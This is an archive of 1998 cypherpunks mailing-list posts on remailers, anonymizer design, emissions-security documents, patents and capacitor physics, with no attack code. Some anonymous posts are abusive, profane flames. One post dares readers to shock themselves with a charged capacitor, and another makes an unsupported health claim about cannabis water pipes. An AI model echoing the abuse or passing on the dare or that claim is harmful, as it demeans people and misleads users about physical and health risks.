don't need to buy Internet access to use free Internet e-mail. Get
completely free e-mail from Juno at http://www.juno.com/getjuno.html or
call Juno at (800) 654-JUNO [654-5866]

___________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com/getjuno.html
or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zzq2@juno.com (John P Walker)
Date: Sat, 21 Nov 1998 11:28:14 +0800
To: cypherpunks@toad.com
Subject: Mea Cupla
Message-ID: <19981120.221100.-1897.3.zzq2@juno.com>
MIME-Version: 1.0
Content-Type: text/plain



I am afraid I just accidently posted a completely off topic message. 
This is because the address of cypherpunks and my friend are next to each
other in my address book, and I clicked on the wrong one.  Again, I am
very sorry to waste your time.

				-John
___________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com/getjuno.html
or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Sat, 21 Nov 1998 12:53:01 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Re:
In-Reply-To: <83762d986d152f062f0bd96df4654a34@anonymous>
Message-ID: <36564138.F1EC2D99@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain



Mixmaster wrote:

> Bernardo Terrado:  take your motherfucking, goddamned sorry warez ass to FUCKING hell!

[flying fuckfest snipped...]Oh shit! Bwahhaahaaa, HAHABWAAAHAHAAAA!!!DAMN! Now look what you made me do, I gotta change my pants.
Harumffff, BWFFFFAHAAHAAAAAA!!! Jeeezuz. Sheesh.
You go wash your mouth before you kiss your mother. Goddamn.



begin:          vcard
fn:             Rick Burroughs
n:              Burroughs;Rick
email;internet: riburr@shentel.net
x-mozilla-cpt:  ;0
x-mozilla-html: FALSE
version:        2.1
end:            vcard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Judd Howie" <coax_k@beavisandbutthead.com>
Date: Sat, 21 Nov 1998 02:11:56 +0800
To: <cypherpunks@toad.com>
Subject: NYM
Message-ID: <003101be14ac$10552ae0$57eb18d2@irix2>
MIME-Version: 1.0
Content-Type: text/plain



Could anyone please suggest some reliable and online nym servers besides
nym.alias.net?
Preferably free.

TIA.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 21 Nov 1998 10:04:20 +0800
To: cypherpunks@toad.com
Subject: Re: none
In-Reply-To: <83762d986d152f062f0bd96df4654a34@anonymous>
Message-ID: <199811210137.CAA27845@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>>>> PureFUCK <mixmaster@remail.obscura.com> fucking wrote:

[a whole lot of fucking text deleted]

  > i use Linux, GNUware, etc...

[more fucking text deleted]

don't *real* fucking linux hackers say `fscking'?
just fucking curious... 

-- NotTheBobMonger ;-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 21 Nov 1998 11:21:22 +0800
To: cypherpunks@toad.com
Subject: do not fold spindle or mutilate
Message-ID: <199811210255.DAA02082@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:15 PM 11/19/98 -0500, Bill Stewart wrote:
>Encryption is NOT just "mathematics, period".  It's mathematics,
>plus operations, password management, key distribution,
>keeping track of who's allowed to see what, 
>plus hardware and operating systems to run the mathematics on,
>and unless you're running it in wetware, it's also
>computer security to protect the hardware and operating systems.
>And it's black operations to go out and steal the other guys'
>hardware and keys and yellow-sticky-notes and crack their OSs.

Actually, to a sufficiently advanced civilization, these are
all describable with mathematics.

>In some contexts, especially real people's contexts,
>your PC may be a fine place to run the encryption,
>but in an NSA / DoD context, especially when there's a war on,
>the safest way to manage many of these things is to use
>dedicated tamper-resistant hardware with the users on one side

Nota bene: tamper-detection + zeroizing >> tamper resistance.

--Pasty aliens spied my mugs








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 21 Nov 1998 11:18:58 +0800
To: cypherpunks@cyberpass.net
Subject: m'men / baiting
Message-ID: <199811210255.DAA02118@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 01:01 PM 11/20/98 -0600, Igor Chudov @ home wrote:
>I am not convinced that the bullets that struck the command post
>were not simply hunting bullets that went astray.

Pessimist.








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Sat, 21 Nov 1998 14:47:53 +0800
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: Free Email as Anonymous Remailer Re: NPR is at it again...
In-Reply-To: <3.0.5.32.19981114002632.007caa30@idiom.com>
Message-ID: <Pine.BSF.3.96.981121065532.2364A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



Sorry for the slow reply. Any http anonymizer not using link padding is
subject to trivial traffic analysis. See the "Pipe-net" thread in the
archive. Also see the graphs at http://www.onion-router.net/Vis.html

What makes the graphs all the more impressive is that the OR people used
to argue against my claim that you need link padding. They don't argue any
more. ;-)

--Lucky

On Sat, 14 Nov 1998, Bill Stewart wrote:

> At 11:47 PM 11/11/98 +0100, Lucky Green wrote:
> >On Wed, 11 Nov 1998, Bill Stewart wrote:
> >> An interesting project would be a free low-volume anonymizer cgi for Apache,
> >> given the large number of current users and the much larger number
> >> of people who will run web servers once they have cable modems.
> >How do you do chaining with a cgi?
> 
> Looks easy enough to do, if a bit ugly, where "ugly" is somewhat equivalent to
> "build yet another local proxy widget to hide the gory details",
> though it's not really much uglier than doing a good anonymizer,
> and getting details like cookies and Java/script right are harder.
> 
> Define "encrypted" as "PGP or something like it".  It may be possible
> to gain some efficiencies by using SSL, but not critical.
> Take a cgi script and use POST to hand it an encrypted block containing:
> 	Response-Key:  
> 	HTTP Request, either vanilla URL or cgi URL with GET or POST data.
> 	Maybe some digicash
> 	Maybe some additional data
> The script fetches the URL, handing along any data,
> packages the response in HTTP reply format, and encrypts it with the 
> response key for the client proxy to unpack.
> 
> To chain these, have the client nest the requests, doing a
> URL that points to another anonymizer script and POSTs an encrypted block.
> Eventually you'll get to a non-anonymizing URL;
> it may be interesting to include any expected cookies in the block,
> so the client can hand them to the destination web server,
> or to gain some efficiencies by having the cgi script fetch
> any IMG requests, and sending a bundle of HTTP reply packets
> instead of just a single one.
> 
> The problems - 
> - How can easily can you break the system?  
> --- Does it leave too many open connections that can be followed?
> --- Does the decreasing size of the requests and
> 	increasing size of responses make it too easy to trace?
> --- What other obvious security holes are there?
> - Timeouts or other problems?
> - Denial of service attacks?
> 
> 				Thanks! 
> 					Bill
> Bill Stewart, bill.stewart@pobox.com
> PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639
> 


-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr.G" <drg@pgh.org>
Date: Sat, 21 Nov 1998 23:01:26 +0800
To: "Igor Chudov @ home" <ichudov@Algebra.COM>
Subject: Re: SIGH... NOT!! THC tainted oranges
In-Reply-To: <199811201619.KAA17451@manifold.algebra.com>
Message-ID: <Pine.LNX.3.96.981121082439.4283B-100000@www5.localweb.com>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 20 Nov 1998, Igor Chudov @ home wrote:

> Date: Fri, 20 Nov 1998 10:19:32 -0600 (CST)
> From: "Igor Chudov @ home" <ichudov@Algebra.Com>
> To: "Dr.G" <drg@pgh.org>
> Cc: ichudov@Algebra.Com, schear@lvcm.com, apf2@apf2.com,
>     cypherpunks@cyberpass.net
> Subject: Re: SIGH... NOT!! THC tainted oranges
> 
> Dr.G wrote:
> > 
> > On Thu, 19 Nov 1998, Igor Chudov @ home wrote:
> > 
> > > Date: Thu, 19 Nov 1998 14:51:58 -0600 (CST)
> > > From: "Igor Chudov @ home" <ichudov@Algebra.Com>
> > > To: Steve Schear <schear@lvcm.com>
> > > Cc: apf2@apf2.com, cypherpunks@cyberpass.net, drg@pgh.org
> > > Subject: Re: SIGH... NOT!! THC tainted oranges
> > > 
> > > I would certainly appreciate pot yeast.
> > > 
> > 
> > I would certainly appreciate some pot.
> 
> Well, I never smoked pot because I do not like the idea of smoking
> anything and inhaling all this tar, soot, etc. 

That is true with a joint.  But a water pipe, like an aqua pipe,
removes 95% of all of that tar and other crap.  It is in the test results
envelope in every aqua pipe package.

That pipe is available in most cigar & pipe tobacco shops.

I saw my friends having
> real fun with pot and thought that pot bread or something like that
> would be great.
> 
> Perhaps I sound very ignorant...
> 

No, just somewhat uninformed, as most people are regarding cannabis.

You can vaporize pot and/or eat pot, for medicinal purposes.


-JG




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 22 Nov 1998 01:36:53 +0800
To: cypherpunks@einstein.ssz.com
Subject: EMSEC Docs
Message-ID: <199811211701.MAA04223@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Thanks to JM's pointers we offer three related May 1998 
USAF docs on emissions security:

AFI 33-203 - Emissisions Security

   http://jya.com/afi33-203.htm  (61K)

AFSSI 7010 - Emission Security Assessments

   http://jya.com/afssi-7010.htm  (110K)

AFSSM 7011 - Emission Security Countermeasures Reviews

   http://jya.com/afssm-7011.htm  (515K)

Or, a zipped package of the three:

   http://jya.com/afemsec.zip  (146K)

While there's a fair amount in the last two docs about  
security for classified NONSTOP and HIJACK systems,
we'd welcome more detail to fill in the deleted parts.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Sun, 22 Nov 1998 04:51:17 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <5bc6aa72d01810e8c3dc57cbcb82e8b6@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



++Date: Sat, 21 Nov 1998 02:37:45 +0100
++From: Anonymous <nobody@replay.com>
++To: cypherpunks@toad.com
++Subject: Re: none
++
++>>>> PureFUCK <mixmaster@remail.obscura.com> fucking wrote:
++
++[a whole lot of fucking text deleted]
++
++  > i use Linux, GNUware, etc...
++
++[more fucking text deleted]
++
++don't *real* fucking linux hackers say `fscking'?
++just fucking curious... 
++
++-- NotTheBobMonger ;-)

hi NotTheBobMonger!

well, yes, you are absoFUCKINGlutely correct; we do indeed generally use "fsck" instead of "GO FUCK YOURSELF, bernardo terrado". 

i decided to make an exception for Bernardo "Go Fuck Yourself" Terrado though.

i generally say "FUCK" every April too though when the IRS *violently* tosses my fucking salad.

Regards,
 
-- PureFUCK  
-- finger tossmyfsckingsalad@irs.gov for my NSA approved, backdoored, and sold out by NAI, PGP key    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sun, 22 Nov 1998 04:07:31 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: How to make non-neutral charge batteries...
In-Reply-To: <199811100313.VAA15569@einstein.ssz.com>
Message-ID: <3.0.5.32.19981121134111.00b98100@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:13 PM 11/9/98 -0600, Jim Choate wrote:
>The two vertical plates above are not a capacitor. They simply represent
>some mechanism to hold charge, Leyden Jars for example.

A Leyden Jar _IS_ a capacitor, which _IS_ a mechanism to hold charge.
Capacitors don't have to come from a factory in plastic or ceramic packaging;
they're simply two (or more) conductive surfaces separated by insulation;
that insulation can be air (or probably even vacuum), though there are
much better insulators around, which commercial capacitors normally use.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sun, 22 Nov 1998 04:08:16 +0800
To: Michael Motyka <cypherpunks@cyberpass.net
Subject: Re: Digital cockroaches, 5 IP's per body by 2000 [CNN]
In-Reply-To: <3655BB59.76A8@lsil.com>
Message-ID: <3.0.5.32.19981121141105.00b9d9a0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:56 AM 11/20/98 -0800, Michael Motyka wrote:
>>    "Everyone will have an average of five IP objects on their body by
>>    2000," he predicted. 
>This is just blue sky space cadet baby wish babble. AKA : typical
>marketing spew.   [....]
>Why would I voluntarily wear five independent tracking devices? So Louis
>Freeh can do telemetry and administer electroshock from Windows 2000?

A while back I stopped wearing a wristwatch because I was normally
carrying about 5 things that did or should know what time it was,
between pagers, cellphone, etc.  IP is less likely, but maybe it'll happen.

There's no reason to assume the IP devices are transmit-connected
to the outside world; if you've wearing or carrying multiple devices
that talk two each other, and CPU is nearly free, might as well
put a Layer 3 protocol on them as well as Layer 1 and Layer 2,
so your Gargoyle-Vision eyeglasses and left or right earpieces can operate
independently and wireless, regardless of whether you're carrying
the backpack microCray or just one or more of the beltpack or
pocketsized WhereAmIGPS receiver, VoicePDA, Sony WalkPerson, 
more flexible hearing aid, 1-way pager, or broadcast news receiver,
all of which can be smaller and more convenient because they
share the same output displays rather than each having their own,
as well as having the two-way IPcellphone, shoephone, email, and web,
and the one-or-two-way pickup of data feeds from museums, 
data-billboards, traffic reports, sidewalk-toll-collection, and air tax.

But even the two-way devices don't _have_ to support tracking you -
some of the Mobile IP protocols are better at that than others,
so the Feds may know that somebody with a DHCP address is tunneled
into the microcell on the streetcorner, but not who, or alternatively
they may be able to see the outside of the tunnel to trace you
but not see the insides.  After all, the military's happy to develop
location-hiding protocols, like onion routing, even if the FBI
and other parts of the military want traceability and eavesdropping.




>Anyone know a URL for Starion nee Comsec( 3DES telephones ) ?

If that's Eric Blossom's company, Altavista should know where to find it.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Sun, 22 Nov 1998 04:52:48 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: "The FBI has become part of the heart, soul and fabric of America"
Message-ID: <365721A6.ACC013F4@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain


The new Strategic Information an Operations Center is unveiled at FBI headquarters
in Washington, D.C. Counterterrorism, computer and violent crime units
have dibs on the center's resources. George Bush cut the ribbon and reporters
were given one last look at tax dollars before they cross over the event
horizon. Subject of this post is a quote from Attorney General Reno at
the unveiling.
http://www.washingtonpost.com/wp-srv/WPlate/1998-11/21/077l-112198-idx.html

Also, a press release from the DOJ (marked "Not For Release"), announcing
a photo op of the Attorney General with Brady "Instant Check" employees
at the FBI Complex at Clarksburg, WVa on thursday, Nov. 19. Photo op was
announced Nov. 18, media responses were required close of business the
same day. National Instant Check System for handgun, rifle and shotgun
sales begins operation on Nov. 30. http://www.usdoj.gov/opa/pr/1998/November/553at.htm

I'm neutral on gun registration but the giant sucking sound from WVa
is bothering my chickens.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 22 Nov 1998 05:53:42 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: How to make non-neutral charge batteries... (fwd)
Message-ID: <199811212131.PAA16124@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 21 Nov 1998 13:41:11 -0500
> From: Bill Stewart <bill.stewart@pobox.com>
> Subject: Re: How to make non-neutral charge batteries...

> At 09:13 PM 11/9/98 -0600, Jim Choate wrote:
> >The two vertical plates above are not a capacitor. They simply represent
> >some mechanism to hold charge, Leyden Jars for example.
> 
> A Leyden Jar _IS_ a capacitor, which _IS_ a mechanism to hold charge.

No shit Bill.....

> Capacitors don't have to come from a factory in plastic or ceramic packaging;
> they're simply two (or more) conductive surfaces separated by insulation;
> that insulation can be air (or probably even vacuum), though there are
> much better insulators around, which commercial capacitors normally use.

No shit twice Bill, I make mine for my Tesla Coil out of copper sheeting and
BIG (3ft x 6ft) plates of glass that were scrapped from a constuction site.

Know what?

If you take the Layden Jar, put a charge on the inside plate and then remove
the OUTSIDE plate which is required to get it there, IT STILL HOLDS A
CHARGE.

Don't believe it? Try this:

Take one plane of glass and two copper sheets.

Place a glass between alternating copper layers thusly:

 Cu >    -----------------------
       ---------------------------    < glass
         ----------------------- < Cu

Then place a charge on it by using a standard battery.

Then remove the metal plates leaving just the glass.

Where do YOU believe the charge is stored, on the metal plates?

If so....BUUUUUZZZZZZZ....wrong answer.

If it were so we'd get a discharge if we connect the two metal sheets
together after removing from the glass plate, you won't.

If you put two metal plates on the glass and connect them again you'll
get a spark.

The charge RESTS ON THE SURFACE OF THE INSULATOR, the metal plates are there
so that we can get an even charge distribution QUICKLY across the insulating
dielectric. You could do it using just a couple of wires touching opposite
sides of the glass but it will take a whopping long time to get the charge
on the dielectric plate because it's an insulator and it has very few surface
electrons (one of the characteristics of an insulator) to help distribute it.

I'll let you in on another little secret.

If you take two Leyden Jars and charge the inside plates of the two jars
alternately and then connect them with a wire you'll get a spark clearly
demonstrating charge flow, even if the outside plates aren't connected.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 22 Nov 1998 05:55:57 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Oh, a warning about playing with glass & charge....
Message-ID: <199811212138.PAA16195@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



If you do decide to play with charges stored on glass plates wear eye
protection because every once in a while the mechanical stress is more than
the glass can take and it will shatter.

One way you can do this is to go to your local video arcade and purchase one
of the glass sheets they use to cover their pinball machines. Then carry
that glass plate by the edge in your hand as you scuff your feet across a
nylon pile carpet (again wear safety glasses). The result about 1 out of 100
times, or if you've got lots of patience and can afford hours to scuff feet
on carpet, is that the glass plate will shatter with a report about
equivalent to a .22. Anyone watching should also wear eye protection as the
shards can go 20ft. or moe. It's best if you do this on a cold dry day.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 22 Nov 1998 06:21:33 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Another charge question for you physics genius'es
Message-ID: <199811212202.QAA16288@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Get yourself a 10,000 mike electrolytic cap. I prefer one of the cylindrical
blue ones that have the 8-32 threaded terms on the top. Put a screw in each
terminal. Short the screws with commen copper connection wire. Let it sit
for several days to be sure there is no charge on it.

Then remove the wire and let it sit for a couple of weeks. Then I dare you
to touch it to your tongue.

The question is:

Where did that charge that just knocked the shit out of you come from?


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 22 Nov 1998 06:26:39 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Error Condition Re: Another charge question for you physics genius'es (fwd)
Message-ID: <199811212205.QAA16339@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



I guess Bill's decided to play around with his filtering software....

Forwarded message:

> From cypherpunks@openpgp.net Sat Nov 21 16:02:59 1998
> From: cypherpunks@openpgp.net
> Date: Sat, 21 Nov 1998 16:58:50 -0500
> Message-Id: <199811212202.QAA16288@einstein.ssz.com>
> Errors-To: whgiii@openpgp.net
> Reply-To: cypherpunks@openpgp.net
> Originator: cypherpunks@openpgp.net
> Sender: cypherpunks@openpgp.net
> Precedence: bulk
> To: ravage@einstein.ssz.com
> Cc: whgiii@openpgp.net
> Subject: Error Condition Re: Another charge question for you physics genius'es
> X-Listprocessor-Version: 6.0 -- ListProcessor by Anastasios Kotsikonas
> X-Loop: ssz.com
> Content-Type: text
> X-Mailer: ELM [version 2.4 PL23]
> X-Loop: openpgp.net
> 
> 
> We are sorry, but this system sensed the following request which may have been
> inadvertedly sent to this list:
> 
> GET YOURSELF A 10,000 MIKE ELECTROLYTIC CAP. I PREFER ONE OF THE CYLINDRICAL
> 
> If your posting was intentional, please accept our apologies and resend your
> mail message, making sure you do not include anything that may look like a
> request in the first line of the body of the actual message. If this was 
> indeed a request please resend it to listproc
> Your entire message
> is copied below.
> 
> -------------------------------------------------------------------------------
> Get yourself a 10,000 mike electrolytic cap. I prefer one of the cylindrical
> blue ones that have the 8-32 threaded terms on the top. Put a screw in each
> terminal. Short the screws with commen copper connection wire. Let it sit
> for several days to be sure there is no charge on it.
> 
> Then remove the wire and let it sit for a couple of weeks. Then I dare you
> to touch it to your tongue.
> 
> The question is:
> 
> Where did that charge that just knocked the shit out of you come from?
> 
> 
>     ____________________________________________________________________
>  
>             Lawyers ask the wrong questions when they don't want
>             the right answers.
> 
>                                         Scully (X-Files)
> 
>        The Armadillo Group       ,::////;::-.          James Choate
>        Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
>        www.ssz.com            .',  ||||    `/( e\      512-451-7087
>                            -====~~mm-'`-```-mm --'-
>     --------------------------------------------------------------------
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 22 Nov 1998 07:28:34 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Error Condition Re: Another charge question for you physics genius'es (fwd)
Message-ID: <199811212307.RAA16588@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "William H. Geiger III" <whgiii@openpgp.net>
> Date: Sat, 21 Nov 1998 17:05:10 -0500
> Subject: Re: Error Condition Re: Another charge question for you physics genius'es (fwd)

> In <199811212205.QAA16339@einstein.ssz.com>, on 11/21/98 
>    at 04:05 PM, Jim Choate <ravage@einstein.ssz.com> said:
> 
> >I guess Bill's decided to play around with his filtering software....
> 
> No, listproc has some internal filtering to prevent message loops, subscribe requests, error messages, ect from going out to the main list. Unfortunately these settings can not be adjusted in the list settings but are set at compile time for the software.
> 
> I have a shitload of error messages in my mailbox I have to sort through and figure out wether listproc is going to be too much of a PITA. I may have to get majordomo installed on the system and use that if this becomes too much of a problem (I really don't have time to be continually babysitting the system).
> 
> Ahhh the joy and fun of running a CP node. :)

:)

Good luck and apologies for my incorrect conclusion.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Sun, 22 Nov 1998 08:09:45 +0800
To: Multiple recipients of list <cypherpunks@openpgp.net>
Subject: Re: Error Condition Re: Another charge question for you physics genius'es (fwd)
Message-ID: <199811212259.RAA015.03@whgiii>
MIME-Version: 1.0
Content-Type: text/plain



In <199811212307.RAA16588@einstein.ssz.com>, on 11/21/98 
   at 06:03 PM, Jim Choate <ravage@einstein.ssz.com> said:

>Forwarded message:

>> From: "William H. Geiger III" <whgiii@openpgp.net>
>> Date: Sat, 21 Nov 1998 17:05:10 -0500
>> Subject: Re: Error Condition Re: Another charge question for you physics genius'es (fwd)

>> In <199811212205.QAA16339@einstein.ssz.com>, on 11/21/98 
>>    at 04:05 PM, Jim Choate <ravage@einstein.ssz.com> said:
>> 
>> >I guess Bill's decided to play around with his filtering software....
>> 
>> No, listproc has some internal filtering to prevent message loops, subscribe requests, error messages, ect from going out to the main list. Unfortunately these settings can not be adjusted in the list settings but are set at compile time for the software.
>> 
>> I have a shitload of error messages in my mailbox I have to sort through and figure out wether listproc is going to be too much of a PITA. I may have to get majordomo installed on the system and use that if this becomes too much of a problem (I really don't have time to be continually babysitting the system).
>> 
>> Ahhh the joy and fun of running a CP node. :)

>:)

>Good luck and apologies for my incorrect conclusion.

FWIW when a message is rejected both the sender and myself should get CC'd a copy of the message and the reason for the reject so no messages should be "lost". Some of the filtering is nice, like those elmz blank subject error messages are filtered out by the program. Unfortunatly a "good" message gets filtered and I need to manually forward it to the list.

Since I don't have any subscribers yet this has not been a problem. :)

-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <PaulMerrill@acm.org>
Date: Sun, 22 Nov 1998 08:10:06 +0800
To: cypherpunks@Algebra.COM
Subject: Re:
In-Reply-To: <199811212304.AAA22006@replay.com>
Message-ID: <365751AD.DE3C8DBF@ACM.Org>
MIME-Version: 1.0
Content-Type: text/plain



I am not sure which of these assholes I feel sorrier for, the asshole
with absolutely no clue about anything but fow to say
"Moahahahahahahahahahahahahahahahahahah" or the dipwad that shows some
signs of being capable of detecting clues, but never learned how to
read.  While I do use Microsoft products, I am not a supporter of them.  

BTW if you (insist on placing words in my mouth, at least try not to be
such a chickenshit about it by thoroughly hiding yourself while
attempting to smear me all over.  --  and you missed the H.

Paul *H.* Merrill

PHM

Anonymous wrote:
> 
> <nobody@replay.com> wrote:
> 
> >Moahahahahahahahahahahahahahahahahahah
> >u STOOPID dickheads and fuckwads supporting
> >CUNTS like micro$oft or even working there.
> >FUCK YOU lousy cockroaches. I, the great
> >tormentor and terminator will stamp you
> >out and exterminate you like the pests you
> >are.
> >HaHaHaHaHaHa mothafuckaz.
> >You will all die and give way to a better
> >world, better people and better systems.
> >Long live Unix, Mac, Amiga and TERROR.
> 
> You are confusing the rest of us with Paul Merrill <PHM@sprynet.com>.
> Please remedy this situation immediately. Some of us do not support the
> Legion of Idiots as he does.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip Hallam-Baker" <hallam@ai.mit.edu>
Date: Sun, 22 Nov 1998 13:49:35 +0800
To: "Vin McLellan" <brownrk1@texaco.com>
Subject: RE: Rivest Patent
In-Reply-To: <v04003a09b278d1158ded@[198.115.179.81]>
Message-ID: <019b01be15d3$818348a0$a3283480@games>
MIME-Version: 1.0
Content-Type: text/plain



> >I have no idea if Watt had a patent on the steam governor. But I bet he
> >didn't try to take one out on Boyle's Law.

I seem to recall that he tried to patent the idea of feedback -
and was refused. He got the govenor patent though.

I think the biggest problems are not so much in the extensions
to the internationally accepted scope of patentability that the
US patent office has uniquely indulged in in the past but the
more recent accretions. Business models and experimental data
are now being allowed - what possible justification can there
be for giving the first person to mechanically sequence a piece
of DNA exclusive commercial rights to exploit that knowledge.

Ulitmately the US PTO has become an international object of
ridicule and contempt. The PTO operates under a condition of
moral hazard - it knows that it is likely to be sued for refusing
a patent but cannot be sued for incompetently (or for that
matter even maliciously granting one).

One enterprising chappie even patented PEM - using the RFC as
a reference in the claim! There are numerous examples of
similar negligence. I can provide several examples of US patents
issued with identical independent claims, in one case near 
identicaly worded.

Rather than debate the PTO's actions of 20 years ago it would seem
more appropriate to discuss their current actions. 

		Phill 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 22 Nov 1998 07:45:04 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <199811212304.AAA22006@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



<nobody@replay.com> wrote:

>Moahahahahahahahahahahahahahahahahahah
>u STOOPID dickheads and fuckwads supporting
>CUNTS like micro$oft or even working there.
>FUCK YOU lousy cockroaches. I, the great
>tormentor and terminator will stamp you
>out and exterminate you like the pests you
>are.
>HaHaHaHaHaHa mothafuckaz.
>You will all die and give way to a better
>world, better people and better systems.
>Long live Unix, Mac, Amiga and TERROR.

You are confusing the rest of us with Paul Merrill <PHM@sprynet.com>.
Please remedy this situation immediately. Some of us do not support the
Legion of Idiots as he does.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 22 Nov 1998 23:24:00 +0800
To: prz@pgp.com
Subject: KRA on NAI/KRA
Message-ID: <199811221443.JAA09869@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Phil and Cabe,

For your info. Response will be very welcome.

John

---------
